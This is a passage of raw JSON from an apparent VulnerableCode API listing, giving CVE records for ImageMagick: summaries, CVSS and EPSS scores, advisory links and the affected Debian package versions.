"VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-19949" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ccbh-689z-6kg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80605?format=api", "vulnerability_id": "VCID-cmym-m1da-f3fg", "summary": "ImageMagick: Division by zero in ImplodeImage in MagickCore/visual-effects.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20244.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20244.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20244", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32448", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32281", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.3248", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32447", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32591", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32628", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.3245", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32499", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32526", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.3253", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32493", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32466", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32502", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20244" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20244", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20244" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928959", "reference_id": "1928959", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928959" }, { "reference_url": "https://security.archlinux.org/AVG-1579", "reference_id": "AVG-1579", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1579" }, { "reference_url": "https://usn.ubuntu.com/5158-1/", "reference_id": "USN-5158-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5158-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20244" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cmym-m1da-f3fg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81992?format=api", "vulnerability_id": "VCID-cure-qgzj-8qfu", "summary": "ImageMagick: outside the range of representable values of type 'long' and integer overflow at MagickCore/transform.c and MagickCore/image.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25675.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25675.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25675", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31996", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32163", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32066", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3207", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31999", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32032", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3201", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31817", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25675" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25675", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25675" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891933", "reference_id": "1891933", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891933" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25675" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cure-qgzj-8qfu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79109?format=api", "vulnerability_id": "VCID-djqz-f6k5-fqfj", "summary": "ImageMagick: memory leaks with convert command", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3574.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3574.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3574", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08708", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08736", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08785", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08717", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08795", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08821", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08788", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08773", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08661", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08646", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.088", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.08815", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3574" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3574", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3574" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1027164", "reference_id": "1027164", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1027164" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124540", "reference_id": "2124540", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124540" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": 